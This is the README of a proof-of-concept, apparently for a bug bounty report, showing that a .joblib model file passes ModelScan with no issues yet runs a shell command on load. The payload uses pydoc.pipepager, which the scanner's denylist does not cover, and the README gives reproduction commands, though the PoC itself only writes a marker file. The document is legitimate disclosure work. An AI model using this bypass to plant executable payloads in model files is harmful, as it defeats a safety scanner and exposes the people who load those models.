Joblib ModelScan Bypass PoC
This is a harmless proof-of-concept for a .joblib model-file scanner bypass.
The payload uses Python's standard-library pydoc.pipepager callable. Loading the file with joblib.load() executes a shell command, but ModelScan's pickle scanner reports zero issues because pydoc is not included in its unsafe-global denylist.
The payload command only writes modelscan_bypass_marker.txt in the current working directory.
Files
poc_joblib_windows.joblib- Windows PoC payload; harmless marker viacmd /c.poc_joblib_posix.joblib- Linux/macOS PoC payload; harmless marker viash -c.verify_poc.py- runs ModelScan first, then loads the payload withjoblib.load()and checks the marker.requirements.txt- tested withmodelscan==0.8.8andjoblib==1.5.3.modelscan_result_pypi_windows.json- primary Windows verification using PyPImodelscan==0.8.8:0 issues,0 errors.modelscan_result_recheck_windows.json- second Windows recheck showing the same bypass result.modelscan_result_posix.json- POSIX verification result.generate_poc.py- generates the.joblibpayload files.huntr_report_draft.md- draft report text for Huntr.
Reproduce
Install runtime dependencies:
pip install joblib modelscan
Generate payloads:
python generate_poc.py --out-dir .
Verify on Windows:
python verify_poc.py --payload poc_joblib_windows.joblib
Verify on Linux/macOS:
python verify_poc.py --payload poc_joblib_posix.joblib
Expected result:
ModelScan issues: 0
ModelScan errors: 0
Marker created by joblib.load: True
Marker contents: MODEL_SCAN_BYPASS
Impact
This demonstrates arbitrary command execution when a .joblib file is loaded, while the same file passes ModelScan with no issues. This fits the high-value Model File Vulnerability category for scanner bypass and code execution through model loading.